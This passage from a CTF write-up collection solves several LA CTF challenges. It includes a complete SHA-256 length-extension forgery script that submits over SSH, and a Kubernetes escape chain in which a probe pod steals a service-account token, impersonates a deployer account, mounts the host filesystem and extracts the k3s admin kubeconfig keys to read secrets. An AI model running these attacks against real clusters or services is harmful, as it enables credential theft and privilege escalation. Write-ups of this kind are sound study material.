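points = [(x, y) for x in range(p) for y in range(p)
          if (x * x + y * y) % p == 1]
assert len(points) == p + 1

# ... and every point's order divides p + 1
def scalarmult(P, k):
    r, base = (0, 1), P
    while k:
        if k & 1:
            r = clockadd(r, base)
        base = clockadd(base, base)
        k >>= 1
    return r

assert all(scalarmult(P, p + 1) == (0, 1) for P in points)
```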

**Step 3: Pohlig-Hellman attack.** Since the group order is entirely smooth, the discrete log problem decomposes via Pohlig-Hellman into tiny subgroup DLPs, each solvable with baby-step giant-step in O(√q) time where q ≤ 64489. CRT combines the partial results to recover Alice's full secret key.
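The decomposition can be sketched on a toy multiplicative group, Z\_31^\* of order 30 = 2·3·5, with brute force standing in for BSGS (all numbers illustrative):

```python
# Toy Pohlig-Hellman: the challenge does the same on the clock group.
p, order = 31, 30
g, secret = 3, 17          # 3 generates Z_31^*
target = pow(g, secret, p)

residues, moduli = [], []
for q in (2, 3, 5):
    e = order // q
    g_sub = pow(g, e, p)              # element of order q
    t_sub = pow(target, e, p)
    # brute-force the small DLP (BSGS at full size)
    r = next(k for k in range(q) if pow(g_sub, k, p) == t_sub)
    residues.append(r)
    moduli.append(q)

# CRT: combine residues mod 2, 3, 5 into the secret mod 30
x, m = 0, 1
for r, q in zip(residues, moduli):
    # find t with x + m*t ≡ r (mod q)
    t = (r - x) * pow(m, -1, q) % q
    x += m * t
    m *= q
assert x == secret % order
```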

**Step 4: Decrypt.** Compute the shared secret using Alice's secret and Bob's public key, derive the AES key via MD5, and decrypt.

```python
from math import gcd
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
from hashlib import md5
import math

# Points from the challenge
xb = 13187661168110324954294058945757101408527953727379258599969622948218380874617
yb = 5650730937120921351586377003219139165467571376033493483369229779706160055207
xa = 13109366899209289301676180036151662757744653412475893615415990437597518621948
ya = 5214723011482927364940019305510447986283757364508376959496938374504175747801
xbo = 1970812974353385315040605739189121087177682987805959975185933521200533840941
ybo = 12973039444480670818762166333866292061530850590498312261363790018126209960024
enc_flag = bytes.fromhex("d345a465538e3babd495cd89b43a224ac93614e987dfb4a6d3196e2d0b3b57d9")

# Step 1: Recover p from x^2 + y^2 - 1 values via GCD
v1 = xb**2 + yb**2 - 1
v2 = xa**2 + ya**2 - 1
v3 = xbo**2 + ybo**2 - 1
p = gcd(gcd(v1, v2), v3)
# Remove any small factors
for s in range(2, 10000):
    while p % s == 0 and p > s:
        p //= s

# Group order = p+1 (since -1 is a non-residue mod p)
order = p + 1
factors = {
    2: 2, 39623: 1, 41849: 1, 42773: 1, 46511: 1, 47951: 1,
    50587: 1, 50741: 1, 51971: 1, 54983: 1, 55511: 1, 56377: 1,
    58733: 1, 61843: 1, 63391: 1, 63839: 1, 64489: 1
}

def clockadd(P1, P2):
    x1, y1 = P1
    x2, y2 = P2
    return ((x1*y2 + y1*x2) % p, (y1*y2 - x1*x2) % p)

def scalarmult(P, n):
    if n == 0:
        return (0, 1)
    if n < 0:
        P = ((-P[0]) % p, P[1])
        n = -n
    result = (0, 1)
    base = P
    while n > 0:
        if n & 1:
            result = clockadd(result, base)
        base = clockadd(base, base)
        n >>= 1
    return result

def bsgs(base, target, n):
    m = int(math.isqrt(n)) + 1
    table = {}
    base_inv = ((-base[0]) % p, base[1])
    current = target
    for j in range(m):
        table[current] = j
        current = clockadd(current, base_inv)
    giant = scalarmult(base, m)
    current = (0, 1)
    for i in range(m + 1):
        if current in table:
            return (i * m + table[current]) % n
        current = clockadd(current, giant)
    raise ValueError("BSGS failed")

# Pohlig-Hellman
base = (xb, yb)
target = (xa, ya)
remainders, moduli = [], []

for q, e in factors.items():
    exp = order // (q**e)
    g_sub = scalarmult(base, exp)
    t_sub = scalarmult(target, exp)
    if e == 1:
        r = bsgs(g_sub, t_sub, q)
    else:
        r = 0
        gamma = scalarmult(g_sub, q**(e-1))
        t_k = t_sub
        for k in range(e):
            h = scalarmult(t_k, q**(e-1-k))
            d_k = bsgs(gamma, h, q)
            r += d_k * (q**k)
            t_k = clockadd(t_k, scalarmult(g_sub, order - d_k * (q**k)))
    remainders.append(r)
    moduli.append(q**e)

# CRT
def extended_gcd(a, b):
    if a == 0: return b, 0, 1
    g, x, y = extended_gcd(b % a, a)
    return g, y - (b // a) * x, x

r, m = remainders[0], moduli[0]
for i in range(1, len(remainders)):
    r2, m2 = remainders[i], moduli[i]
    g, x, _ = extended_gcd(m, m2)
    lcm = m * m2 // g
    r = (r + m * ((r2 - r) // g) * x) % lcm
    m = lcm
alice_secret = r

# Decrypt
shared = scalarmult((xbo, ybo), alice_secret)
key = md5(f"{shared[0]},{shared[1]}".encode()).digest()
flag = unpad(AES.new(key, AES.MODE_ECB).decrypt(enc_flag), 16)
print(f"Flag: {flag.decode()}")
# lactf{t1m3_c0m3s_f4r_u_4all}
```

Flag: `lactf{t1m3_c0m3s_f4r_u_4all}`

### ttyspin

#### Description

The challenge is a terminal Tetris clone over SSH. You can export/import a save state. Import is protected by a checksum:

```py
sha256((SECRET + username + save_bytes).strip()).hexdigest()
```

The flag is printed only if the in-memory board equals a fixed `winning_board`.

#### Solution

There are two key observations.

**Observation 1: you cannot reach the winning board by playing.** Each placed tetromino adds 4 blocks and each cleared line removes 10 blocks, so the board's non-zero cell count stays even. The provided `winning_board` has 19 blocks (odd), so the only viable path is to **import a crafted save** whose decoded board equals `winning_board`.

**Observation 2: SHA-256 length extension works because glue padding can go in `username`.** The MAC is `SHA256(SECRET || message)` (not HMAC), and `len(SECRET) == 40` is known. The imported `save_bytes` must be valid UTF-8 because `Board.start()` does `save.decode().split("|")`, but `username` is never decoded (it's raw bytes from `sys.stdin.buffer.readline()`), so it can contain arbitrary bytes, including `0x80` and NULs. That lets us do a classic length extension: get a checksum for `SECRET||m`, then forge a checksum for `SECRET||m||glue_padding||ext`, by placing `m||glue_padding` in `username` and `ext` in the imported save (still valid UTF-8).

Practical detail: the code hashes `(SECRET + username + save_bytes).strip()`. If we export with an *empty username* and an *empty board*, the save string ends with many spaces and `.strip()` truncates it, leaving a very short `m` (ending right after the `|` before the board). That keeps `username = m || glue_padding` under the 32-byte username limit.

One more practical constraint: the game only shows the export screen after you have a non-zero score. So you need to score while keeping the board empty; the easiest way is to play until you get a **perfect clear / full clear** (clear lines so the board returns to all-spaces) and then export immediately.

Below is a complete solver that:

* builds a valid save whose board equals `winning_board` (and appends a 1-byte sentinel so `.strip()` won’t trim trailing spaces),
* performs SHA-256 length extension from an exported checksum where username was empty,
* logs in via SSH (Paramiko) and imports the forged save to print the flag.

```py
#!/usr/bin/env python3
import base64
import re
import struct
import sys
import time

import paramiko


# --- Target ---
HOST = "chall.lac.tf"
PORT = 32123
SSH_USER = "ttyspin"
SSH_PASS = "ttyspin"

# From attachments/game.py
WINNING_BOARD = [
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    [7, 0, 0, 0, 0, 0, 0, 0, 0, 0],
    [0, 4, 0, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 6, 0, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 3, 0, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 5, 0, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 1, 0, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 2, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 7, 0, 0],
    [0, 0, 0, 0, 0, 0, 0, 0, 4, 0],
    [0, 0, 0, 0, 0, 0, 0, 0, 0, 6],
    [0, 0, 0, 0, 0, 0, 0, 0, 3, 0],
    [0, 0, 0, 0, 0, 0, 0, 5, 0, 0],
    [0, 0, 0, 0, 0, 0, 1, 0, 0, 0],
    [0, 0, 0, 0, 0, 2, 0, 0, 0, 0],
    [0, 0, 0, 0, 7, 0, 0, 0, 0, 0],
    [0, 0, 0, 4, 0, 0, 0, 0, 0, 0],
    [0, 0, 6, 0, 0, 0, 0, 0, 0, 0],
    [0, 3, 0, 0, 0, 0, 0, 0, 0, 0],
    [5, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]


WHITESPACE = b" \t\r\n\v\f"


def board_to_save_text(board):
    # board tiles are integers 0..7; save format uses letters for 1..7:
    # 1=T 2=J 3=L 4=S 5=Z 6=O 7=I, and space for 0.
    # piece_to_type in board.py: {"T":0,"J":1,"L":2,"S":3,"Z":4,"O":5,"I":6}
    letters = ["T", "J", "L", "S", "Z", "O", "I"]
    out = []
    for row in board:
        for v in row:
            out.append(" " if v == 0 else letters[v - 1])
    return "".join(out)


def build_winning_save_bytes():
    # Any valid header is fine; the win check only compares the board.
    # Save format: current|hold|nexts(4)|queue|board(200 chars)
    current = "T"
    hold = " "
    nexts = "TTTT"
    queue = ""
    board_txt = board_to_save_text(WINNING_BOARD)
    assert len(board_txt) == 200

    # Sentinel to stop .strip() from removing trailing spaces from the board.
    # Board.start() only reads the first 200 chars.
    sentinel = "X"

    s = f"{current}|{hold}|{nexts}|{queue}|{board_txt}{sentinel}"
    return s.encode("utf-8")


# --- Minimal SHA-256 with state injection (for length extension) ---
K = [
    0x428A2F98, 0x71374491, 0xB5C0FBCF, 0xE9B5DBA5, 0x3956C25B, 0x59F111F1, 0x923F82A4, 0xAB1C5ED5,
    0xD807AA98, 0x12835B01, 0x243185BE, 0x550C7DC3, 0x72BE5D74, 0x80DEB1FE, 0x9BDC06A7, 0xC19BF174,
    0xE49B69C1, 0xEFBE4786, 0x0FC19DC6, 0x240CA1CC, 0x2DE92C6F, 0x4A7484AA, 0x5CB0A9DC, 0x76F988DA,
    0x983E5152, 0xA831C66D, 0xB00327C8, 0xBF597FC7, 0xC6E00BF3, 0xD5A79147, 0x06CA6351, 0x14292967,
    0x27B70A85, 0x2E1B2138, 0x4D2C6DFC, 0x53380D13, 0x650A7354, 0x766A0ABB, 0x81C2C92E, 0x92722C85,
    0xA2BFE8A1, 0xA81A664B, 0xC24B8B70, 0xC76C51A3, 0xD192E819, 0xD6990624, 0xF40E3585, 0x106AA070,
    0x19A4C116, 0x1E376C08, 0x2748774C, 0x34B0BCB5, 0x391C0CB3, 0x4ED8AA4A, 0x5B9CCA4F, 0x682E6FF3,
    0x748F82EE, 0x78A5636F, 0x84C87814, 0x8CC70208, 0x90BEFFFA, 0xA4506CEB, 0xBEF9A3F7, 0xC67178F2,
]


def _rotr(x, n):
    return ((x >> n) | ((x & 0xFFFFFFFF) << (32 - n))) & 0xFFFFFFFF


def _ch(x, y, z):
    return (x & y) ^ (~x & z)


def _maj(x, y, z):
    return (x & y) ^ (x & z) ^ (y & z)


def _bsig0(x):
    return _rotr(x, 2) ^ _rotr(x, 13) ^ _rotr(x, 22)


def _bsig1(x):
    return _rotr(x, 6) ^ _rotr(x, 11) ^ _rotr(x, 25)


def _ssig0(x):
    return _rotr(x, 7) ^ _rotr(x, 18) ^ (x >> 3)


def _ssig1(x):
    return _rotr(x, 17) ^ _rotr(x, 19) ^ (x >> 10)


def sha256_glue_padding(msg_len_bytes):
    # Standard SHA-256 padding for a message of length msg_len_bytes.
    ml_bits = msg_len_bytes * 8
    pad = b"\x80"
    # pad with zeros until length ≡ 56 (mod 64)
    pad += b"\x00" * ((56 - (msg_len_bytes + 1) % 64) % 64)
    pad += struct.pack(">Q", ml_bits)
    return pad


def sha256_compress(state, block64):
    w = list(struct.unpack(">16I", block64)) + [0] * 48
    for i in range(16, 64):
        w[i] = (w[i - 16] + _ssig0(w[i - 15]) + w[i - 7] + _ssig1(w[i - 2])) & 0xFFFFFFFF

    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + _bsig1(e) + _ch(e, f, g) + K[i] + w[i]) & 0xFFFFFFFF
        t2 = (_bsig0(a) + _maj(a, b, c)) & 0xFFFFFFFF
        h = g
        g = f
        f = e
        e = (d + t1) & 0xFFFFFFFF
        d = c
        c = b
        b = a
        a = (t1 + t2) & 0xFFFFFFFF

    return [
        (state[0] + a) & 0xFFFFFFFF,
        (state[1] + b) & 0xFFFFFFFF,
        (state[2] + c) & 0xFFFFFFFF,
        (state[3] + d) & 0xFFFFFFFF,
        (state[4] + e) & 0xFFFFFFFF,
        (state[5] + f) & 0xFFFFFFFF,
        (state[6] + g) & 0xFFFFFFFF,
        (state[7] + h) & 0xFFFFFFFF,
    ]


def sha256_continue_from_digest(digest_hex, extra, total_prehashed_len_bytes):
    # Continue SHA-256 from an existing digest (internal state), assuming
    # total_prehashed_len_bytes bytes have already been hashed.
    state = list(struct.unpack(">8I", bytes.fromhex(digest_hex)))
    msg = extra + sha256_glue_padding(total_prehashed_len_bytes + len(extra))
    for off in range(0, len(msg), 64):
        state = sha256_compress(state, msg[off : off + 64])
    return struct.pack(">8I", *state).hex()


def forge_from_export(export_save_b64, export_checksum_hex, *, secret_len=40):
    # We export with empty username, so the MAC is sha256((SECRET + save).strip()).
    save = base64.b64decode(export_save_b64)
    m = save.rstrip(WHITESPACE)

    pad1 = sha256_glue_padding(secret_len + len(m))
    if len(m) + len(pad1) > 32:
        raise RuntimeError(
            f"Need shorter stripped export: len(m)={len(m)} pad={len(pad1)} total={len(m)+len(pad1)} > 32"
        )

    ext = build_winning_save_bytes()

    # Server will hash: SECRET || (m||pad1) || ext, then .strip() (our ext ends with 'X', so no trimming).
    forged_username = m + pad1
    forged_save = ext
    total_prehashed = secret_len + len(m) + len(pad1)
    forged_checksum_hex = sha256_continue_from_digest(export_checksum_hex, ext, total_prehashed)

    return forged_username, base64.b64encode(forged_save), forged_checksum_hex.encode()


def import_and_print_flag(username_bytes, save_b64_bytes, checksum_hex_bytes):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(
        HOST,
        port=PORT,
        username=SSH_USER,
        password=SSH_PASS,
        look_for_keys=False,
        allow_agent=False,
    )

    chan = client.get_transport().open_session()
    chan.get_pty(term="xterm-256color", width=120, height=40)
    chan.invoke_shell()
    chan.settimeout(2.0)

    def recv_all_until_quiet(quiet_seconds=0.6, hard_timeout=10.0):
        buf = b""
        start = time.time()
        last = time.time()
        while True:
            now = time.time()
            if now - start > hard_timeout:
                break
            if chan.recv_ready():
                chunk = chan.recv(65535)
                if not chunk:
                    break
                buf += chunk
                last = now
            else:
                if now - last >= quiet_seconds:
                    break
                time.sleep(0.05)
        return buf

    time.sleep(0.2)
    _ = recv_all_until_quiet(quiet_seconds=0.2, hard_timeout=1.0)

    chan.sendall(username_bytes + b"\n")
    chan.sendall(save_b64_bytes + b"\n")
    chan.sendall(checksum_hex_bytes + b"\n")

    out = recv_all_until_quiet(quiet_seconds=0.8, hard_timeout=12.0)
    m = re.search(br"lactf\{[^}\n]+\}", out, flags=re.IGNORECASE)
    if not m:
        sys.stdout.buffer.write(out)
        sys.stdout.buffer.flush()
        raise RuntimeError("flag not found in output")
    print(m.group(0).decode("ascii", errors="ignore"))

    chan.close()
    client.close()


def main():
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <export_save_b64> <export_checksum_hex>")
        print("Tip: export with empty username, and aim for an empty board so the stripped export is short.")
        return 2

    export_save_b64 = sys.argv[1].encode()
    export_checksum_hex = sys.argv[2].strip()
    username, save_b64, checksum = forge_from_export(export_save_b64, export_checksum_hex)
    import_and_print_flag(username, save_b64, checksum)
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```
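
The length-extension forgery hinges on one property of the glue padding: message plus padding always totals a whole number of 64-byte SHA-256 blocks, which is exactly what lets the server's hash resume from the state encoded in the exported digest. A self-contained check of that alignment (restating `sha256_glue_padding` so the snippet runs on its own):

```python
import struct

def sha256_glue_padding(msg_len_bytes: int) -> bytes:
    # 0x80, zeros until length ≡ 56 (mod 64), then the 64-bit bit length.
    pad = b"\x80" + b"\x00" * ((56 - (msg_len_bytes + 1) % 64) % 64)
    return pad + struct.pack(">Q", msg_len_bytes * 8)

# An empty message pads out to exactly one 64-byte block...
assert len(sha256_glue_padding(0)) == 64

# ...and in general, message + padding is always block-aligned.
for n in range(512):
    assert (n + len(sha256_glue_padding(n))) % 64 == 0
```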

Flag: `lactf{T3rM1n4L_g4mE5_R_a_Pa1N_2e075ab9ae6ae098}`

***

## misc

### CTFaaS - CTFs as a Service!

#### Description

We are given access to a “CTF Challenge Deployer” web UI on a provisioned VM. It accepts a Docker image tarball and exposes a chosen container port via a NodePort. The challenge claims a “Secret in the cluster” contains the company keys (flag), and that sandboxing/RBAC prevents malicious actions.

#### Solution

The core issue is that uploaded images run as pods inside the Kubernetes cluster with a ServiceAccount token. That token can *impersonate* the deployer’s ServiceAccount (`ctf-deployer-sa`). As `ctf-deployer-sa`, we can create pods in `default` and mount a `hostPath` to `/`, which lets us read host files. On k3s, `/etc/rancher/k3s/k3s.yaml` is a kubeconfig containing a client certificate+key that has high privileges. Using those credentials against the apiserver, we can directly read the secret in the hidden namespace and recover the flag.

Steps (commands shown for the instance VM IP `35.219.138.219`):

1. Deploy a probe container so we can read the in-pod ServiceAccount token and talk to the apiserver from inside the cluster.

Probe image code (Dockerfile + server):

```dockerfile
FROM python:3.11-slim

RUN useradd -m app
WORKDIR /app
COPY server.py /app/server.py

USER app
ENV PYTHONUNBUFFERED=1
EXPOSE 8000
CMD ["python", "/app/server.py"]
```

```python
#!/usr/bin/env python3
import base64
import concurrent.futures
import http.client
import json
import os
import socket
import ssl
import sys
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
TOKEN_PATH = os.path.join(SA_DIR, "token")
CA_PATH = os.path.join(SA_DIR, "ca.crt")
NS_PATH = os.path.join(SA_DIR, "namespace")

API = os.environ.get("KUBE_API", "https://kubernetes.default.svc")


def _read(path, default=""):
    try:
        with open(path, "r", encoding="utf-8") as f:
            return f.read().strip()
    except Exception:
        return default


def _default_gw() -> str:
    try:
        with open("/proc/net/route", "r", encoding="utf-8") as f:
            for line in f.read().splitlines()[1:]:
                parts = line.split()
                if len(parts) < 3:
                    continue
                dest, gw = parts[1], parts[2]
                if dest != "00000000":
                    continue
                b = bytes.fromhex(gw)
                ip = ".".join(str(x) for x in b[::-1])
                if ip:
                    return ip
    except Exception:
        pass
    return ""


def tcp_connect(host: str, port: int, timeout: float = 1.0) -> dict:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return {"ok": True}
    except Exception as e:
        return {"ok": False, "error": str(e)}


def tcp_exchange(host: str, port: int, send: bytes = b"", timeout: float = 1.0, recv_bytes: int = 4096) -> dict:
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if send:
                s.sendall(send)
            try:
                data = s.recv(recv_bytes)
            except socket.timeout:
                data = b""
            return {"ok": True, "recv_b64": base64.b64encode(data).decode(), "recv_len": len(data)}
    except Exception as e:
        return {"ok": False, "error": str(e)}


def http_fetch(url: str, timeout: float = 5.0, insecure: bool = False, headers: dict | None = None, max_bytes: int = 64 * 1024) -> dict:
    if not (url.startswith("http://") or url.startswith("https://")):
        return {"ok": False, "error": "only http(s) supported"}
    req = urllib.request.Request(url, method="GET")
    for k, v in (headers or {}).items():
        req.add_header(k, v)
    ctx = None
    if url.startswith("https://"):
        ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            body = resp.read(max_bytes)
            return {
                "ok": True,
                "status": resp.status,
                "headers": dict(resp.headers),
                "body_b64": base64.b64encode(body).decode(),
                "body_truncated": resp.length is not None and resp.length > max_bytes,
                "url": resp.geturl(),
            }
    except Exception as e:
        return {"ok": False, "error": str(e)}


def k8s_request(method, path, body=None, headers=None):
    token = _read(TOKEN_PATH)
    if not token:
        raise RuntimeError("No serviceaccount token mounted")

    url = API.rstrip("/") + path
    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")

    req = urllib.request.Request(url, method=method)
    req.add_header("Authorization", "Bearer " + token)
    req.add_header("Accept", "application/json")
    if data is not None:
        req.add_header("Content-Type", "application/json")
    if headers:
        for k, v in headers.items():
            req.add_header(k, v)

    ctx = ssl.create_default_context(cafile=CA_PATH if os.path.exists(CA_PATH) else None)
    try:
        with urllib.request.urlopen(req, data=data, context=ctx, timeout=10) as resp:
            raw = resp.read()
            ctype = resp.headers.get("content-type", "")
            return resp.status, ctype, raw
    except urllib.error.HTTPError as e:
        raw = e.read()
        return e.code, e.headers.get("content-type", ""), raw


def k8s_request_dupheaders(method, path, body=None, header_items=None):
    token = _read(TOKEN_PATH)
    if not token:
        raise RuntimeError("No serviceaccount token mounted")

    api = urllib.parse.urlparse(API)
    host = api.hostname or "kubernetes.default.svc"
    port = api.port or (443 if api.scheme == "https" else 80)

    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")

    ctx = ssl.create_default_context(cafile=CA_PATH if os.path.exists(CA_PATH) else None)
    conn_cls = http.client.HTTPSConnection if api.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=10, context=ctx if api.scheme == "https" else None)
    try:
        conn.putrequest(method, path)
        base = [
            ("Authorization", "Bearer " + token),
            ("Accept", "application/json"),
        ]
        if data is not None:
            base.append(("Content-Type", "application/json"))
        for k, v in base:
            conn.putheader(k, v)
        for k, v in (header_items or []):
            conn.putheader(k, v)
        conn.endheaders()
        if data is not None:
            conn.send(data)
        resp = conn.getresponse()
        raw = resp.read()
        ctype = resp.getheader("content-type", "")
        return resp.status, ctype, raw
    finally:
        conn.close()


def k8s_get_json(path):
    st, ctype, raw = k8s_request("GET", path)
    try:
        return st, json.loads(raw.decode("utf-8", errors="replace"))
    except Exception:
        return st, {"_raw": raw.decode("utf-8", errors="replace"), "_content_type": ctype}


def k8s_post_json(path, body):
    st, ctype, raw = k8s_request("POST", path, body=body)
    try:
        return st, json.loads(raw.decode("utf-8", errors="replace"))
    except Exception:
        return st, {"_raw": raw.decode("utf-8", errors="replace"), "_content_type": ctype}


class Handler(BaseHTTPRequestHandler):
    def _send(self, code, body, ctype="application/json"):
        if isinstance(body, (dict, list)):
            raw = json.dumps(body, indent=2, sort_keys=True).encode("utf-8")
        elif isinstance(body, (bytes, bytearray)):
            raw = bytes(body)
        else:
            raw = str(body).encode("utf-8")
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(raw)))
        self.end_headers()
        self.wfile.write(raw)

    def do_GET(self):
        if self.path == "/" or self.path.startswith("/?"):
            info = {
                "pod": os.environ.get("HOSTNAME"),
                "namespace": _read(NS_PATH, "unknown"),
                "has_sa_token": os.path.exists(TOKEN_PATH),
                "kube_api": API,
                "kube_host_env": os.environ.get("KUBERNETES_SERVICE_HOST"),
                "pod_ip": (_read("/etc/hosts").splitlines()[-1].split()[0] if _read("/etc/hosts") else None),
                "default_gw": _default_gw() or None,
            }
            self._send(200, info)
            return

        if self.path.startswith("/read"):
            q = urllib.parse.urlparse(self.path).query
            params = urllib.parse.parse_qs(q)
            p = params.get("path", [""])[0]
            if not p or not p.startswith("/"):
                self._send(400, {"error": "path must be absolute"})
                return
            try:
                with open(p, "rb") as f:
                    raw = f.read(64 * 1024)
            except Exception as e:
                self._send(500, {"error": str(e)})
                return
            self._send(200, raw, ctype="text/plain; charset=utf-8")
            return

        if self.path.startswith("/k8s-imp"):
            q = urllib.parse.urlparse(self.path).query
            params = urllib.parse.parse_qs(q)
            p = params.get("path", [""])[0]
            sa = params.get("sa", ["ctf-deployer-sa"])[0]
            ns = params.get("ns", [_read(NS_PATH, "default")])[0]
            if not p.startswith("/"):
                self._send(400, {"error": "path must start with /"})
                return
            user = f"system:serviceaccount:{ns}:{sa}"
            hdr_items = [("Impersonate-User", user)]
            st, ctype, raw = k8s_request_dupheaders("GET", p, header_items=hdr_items)
            try:
                obj = json.loads(raw.decode("utf-8", errors="replace"))
            except Exception:
                obj = {"_raw": raw.decode("utf-8", errors="replace"), "_content_type": ctype}
            self._send(st, obj)
            return

        self._send(404, {"error": "not found"})

    def do_POST(self):
        if self.path.startswith("/ssrr"):
            ns = _read(NS_PATH, "default")
            st, obj = k8s_post_json(
                "/apis/authorization.k8s.io/v1/selfsubjectrulesreviews",
                {"apiVersion": "authorization.k8s.io/v1", "kind": "SelfSubjectRulesReview", "spec": {"namespace": ns}},
            )
            self._send(st, obj)
            return
        self._send(404, {"error": "not found"})

    def log_message(self, fmt, *args):
        sys.stderr.write("%s - - [%s] %s\n" % (self.client_address[0], self.log_date_time_string(), fmt % args))


def main():
    port = int(os.environ.get("PORT", "8000"))
    httpd = HTTPServer(("0.0.0.0", port), Handler)
    print(f"listening on :{port}", flush=True)
    httpd.serve_forever()


if __name__ == "__main__":
    main()
```

Deploy it via the web UI (or with curl), then note the resulting NodePort URL (example: `http://35.219.138.219:32483/`). From that URL, read the in-pod token:

```bash
PROBE=http://35.219.138.219:32483
TOKEN="$(curl -sS "$PROBE/read?path=/var/run/secrets/kubernetes.io/serviceaccount/token")"
```

2. Confirm the key permission: the pod's ServiceAccount (`ctf-app`) can impersonate `ctf-deployer-sa`:

```bash
curl -sS -k -H "Authorization: Bearer $TOKEN" \
  https://35.219.138.219:6443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -H 'Content-Type: application/json' \
  --data '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"default"}}'
```

3. Use that to create a pod *as* `ctf-deployer-sa` with a `hostPath` mount of `/` and read the host’s k3s kubeconfig (`/etc/rancher/k3s/k3s.yaml`). This file contains `client-certificate-data` and `client-key-data`.

```bash
cat > pod.json <<'JSON'
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": { "name": "dumpkube" },
  "spec": {
    "restartPolicy": "Never",
    "containers": [{
      "name": "c",
      "image": "10.43.254.254:5000/challenge-<your_challenge_id>:latest",
      "command": ["sh","-c","cat /host/etc/rancher/k3s/k3s.yaml"],
      "volumeMounts": [{ "name": "host", "mountPath": "/host", "readOnly": true }]
    }],
    "volumes": [{ "name": "host", "hostPath": { "path": "/", "type": "Directory" } }]
  }
}
JSON

curl -sS -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:serviceaccount:default:ctf-deployer-sa" \
  -H 'Content-Type: application/json' \
  --data @pod.json \
  https://35.219.138.219:6443/api/v1/namespaces/default/pods

curl -sS -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:serviceaccount:default:ctf-deployer-sa" \
  'https://35.219.138.219:6443/api/v1/namespaces/default/pods/dumpkube/log' > k3s.yaml
```

4. Extract the client cert/key from `k3s.yaml` and use them to access the hidden namespace and read the secret:

```bash
python3 - <<'PY'
import base64, re, pathlib
s = pathlib.Path("k3s.yaml").read_text()
def grab(k):
  m = re.search(rf"{k}:\s*([A-Za-z0-9+/=]+)", s)
  return base64.b64decode(m.group(1))
pathlib.Path("client.crt").write_bytes(grab("client-certificate-data"))
pathlib.Path("client.key").write_bytes(grab("client-key-data"))
PY

curl -sS -k --cert client.crt --key client.key \
  https://35.219.138.219:6443/api/v1/namespaces/hidden-vault/secrets | jq -r '.items[].metadata.name'

curl -sS -k --cert client.crt --key client.key \
  https://35.219.138.219:6443/api/v1/namespaces/hidden-vault/secrets/real-flag \
  | jq -r '.data.flag' | base64 -d
```

This outputs the flag:

```
lactf{0h_n0_y0u_h4ck3d_my_p34f3c7ly_s3cur3_c7us73r}
```

### cat\_bomb

#### Description

Given an image, determine the location shown to recover the flag.

#### Solution

Reverse image search the provided image and follow the results until you can identify the exact spot. Then view it manually in Google Maps to confirm the location.

The reverse image search result points to **Fushimi Inari Taisha** shrine in Kyoto, Japan.

Flag: `lactf{34.9681588,135.7772502}`

### endians

#### Description

I was reading about Unicode character encodings until one day, my flag turned into Japanese! Does little-endian mean the little byte's at the end or that the characters start with the little byte?

Files: `chall.txt`, `gen.py`

#### Solution

The provided `attachments/gen.py` shows the flag was turned into "Japanese" by encoding with one UTF-16 endianness and decoding with the other:

```python
text = "lactf{REDACTED}"
endian = text.encode(encoding="???").decode(encoding="???")
with open("chall.txt", "wb") as file:
    file.write(endian.encode())
```

In `attachments/chall.txt`, each displayed CJK character is a single code point of the form `U+XX00`, where `XX` is an ASCII byte. That is exactly what happens when UTF-16-LE bytes such as `6c 00` (for `'l'`) are mis-decoded as UTF-16-BE, producing `U+6C00` (`氀`).
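
The mis-decode is easy to reproduce on a single character with the standard codecs:

```python
# 'l' (U+006C) in UTF-16-LE is the two bytes 6c 00; reading those same
# bytes as UTF-16-BE yields the code point U+6C00 instead.
garbled = "l".encode("utf-16-le").decode("utf-16-be")
assert garbled == "\u6c00"  # 氀

# Applying the opposite pair undoes the damage.
assert garbled.encode("utf-16-be").decode("utf-16-le") == "l"
```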

So the forward transform is:

* `encode("utf-16-le")` then `decode("utf-16-be")`

To reverse it, do the opposite:

* `encode("utf-16-be")` then `decode("utf-16-le")`

```python
from pathlib import Path

data = Path("attachments/chall.txt").read_text(encoding="utf-8").strip()
print(data.encode("utf-16-be").decode("utf-16-le"))
```

Flag: `lactf{1_sur3_h0pe_th1s_d0es_n0t_g3t_l0st_1n_translati0n!}`

### error-correction

#### Description

We are given `chall.png`, a scrambled QR code (version 7, 45x45 modules, no border). The challenge script (`attachments/chall.py`) shows it was made by:

1. Generating a QR for the flag (`segno.make(..., mode='byte', error='L', boost_error=False, version=7)`).
2. Splitting the 45x45 module image into a 5x5 grid of 9x9 chunks (25 total).
3. Randomly shuffling the chunks and reassembling into a scrambled QR image.

Goal: recover the original chunk permutation and decode the QR to get the flag.

#### Solution

Phase 1 uses QR *function patterns* (finders, timing, alignment patterns, version info) to place 13 of the 25 chunks uniquely.

The remaining 12 chunks lie entirely in the data area, so structural matching alone is insufficient.
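
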